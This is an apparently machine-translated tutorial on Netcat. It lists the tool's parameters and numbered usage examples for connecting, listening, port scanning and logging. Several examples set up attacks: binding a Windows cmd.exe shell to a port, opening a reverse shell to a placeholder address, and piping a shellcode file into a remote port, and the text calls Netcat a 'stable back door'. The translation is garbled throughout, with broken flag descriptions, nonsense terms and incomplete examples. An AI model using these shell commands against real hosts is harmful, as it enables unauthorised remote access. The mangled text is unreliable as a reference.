Netcat is known as the 'Swiss Army Striker' of the Network Security Assignment. I believe that there is no one who doesn't know it ... a simple and useful tool, read and write data through network connectivity using TCP or UDP protocol. It is designed to be a stable back door tool that can be easily driver directly from other programs and scripts. At the same time, it is also a powerful network debugging and detection tool that can build all types of network connections you need, and there are several very interesting built-in features (see the following method for details).
In China, its Windows version has two versions, one is the original version written by original Chris Wysopal, and the other is the new 'concentration' version after the 'red and black'. The 'concentrated' version of the main program is only more than 10 KB (more than 10 KB NCs can't complete the fourth, fifth usage method described below, this function has the original NC seem to be 60kb: p), although "volume" "Small, but I have completed a lot of work. ============================================ ============================================================================================================================================================================================================= ========= Software introduction:
Tool Name: Netcat Author: Hobbit && Chris Wysopal URL: http: //www.atstake.com/research/tools/network_utilities/ Category: Open Source Platform: Linux / BSD / Unix / Windows WINDOWS next version: [v1.10 NT]
============================================================================================================================================================================================================= ============================================================================================================================================================================================================= = Parameter introduction:
'nc.exe -h' can see the use of each parameter. Basic format: nc [-options] Hostname Port [S] [Ports] ... nc -l -p port [options] [HostName] [port] -d background mode - E PROG program redirection, once connected, [Danger !!] - G Gateway Source-Routing Hop Point [S], Up to 8-g Num Source-Routing Pointer: 4, 8, 12, ...- H Help Information - I SECS Delayed Space - L Listening mode, after the inbound connection -L connection is closed, continue to listen to the IP address of the specified number, can not use the HostName-O File record 16-based transmission -P port local port number -R Random local and remote ports -s addr local source address -t uses Telnet interactive mode -u udp mode -V detailed output - with two -V can get more detailed content -w second output Time -Z to turn off the input and output-used for Scanning
The representation of the port can be written as the range of M-N.
============================================================================================================================================================================================================= ============================================================================================================================================================================================================= = Basic usage:
Probably there are several usage:
1) Connect to the Remote Host, Example: Format: Nc -nvv 192.168.x.x 80 Explanation: Connection to 192.168.x.x TCP80 port
2) Monitor Local Host, Example: Format: NC -L -P 80 Explanation: Monitor the TCP80 port of this machine
3) Scanning the remote host, example: format: nc -nvv -w2 -z 192.168.x.x 80-445 explanation: Scan 192.168.x.x all ports of TCP80 to TCP445
4) Remote host Bind shell, example: format: nc -l -p 5354 -t -e c: /winnt/system32/cmd.exe explanation: Bind the transote host CMDshell in the TCP5354 port of the Remote host
5) Remote host binds shell and reverse connection, example: format: nc -t -ec: /winnt/system32/cmd.exe 192.168.xx 5354 explanation: Bind the CMDshell of the Remote host and connected to 192.168.xx TCP5354 port
The above is the most basic usage (in fact, there are many usage of NC, and when the pipeline command "|" and redirect command "<", ">" and other commands are more powerful ...). ============================================================================================================================================================================================================= ============================================================================================================================================================================================================= = Advanced Usage:
6) In the case of attack, examples: format 1: Type.exe C: /exploit.txt | nc -nvv 192.168.xx 80 format 2: nc -nvv 192.168.xx 80 Attachment: 'c: /exploit.txt' for Shellcode, etc. 7) Tomask [1], Example: Format: NC -L -P 80 Explanation: Use '-L' (note l is uppercase) can listen to a port until Ctrl C is 8) Working honey canage [2], example: format: nc -l -p 80> c: /log.txt explanation: Use '-l' to keep monitoring a port until Ctrl C, Export the result to 'c: /log.txt', if you change '>' change to '>>', you can add a log. Attachment: 'c: /log.txt' is a log, etc. 9) Working honey cans [3], example: format 1: nc -l -p 80 Attachment: 'c: /honeypot.txt' is deceived data, etc.
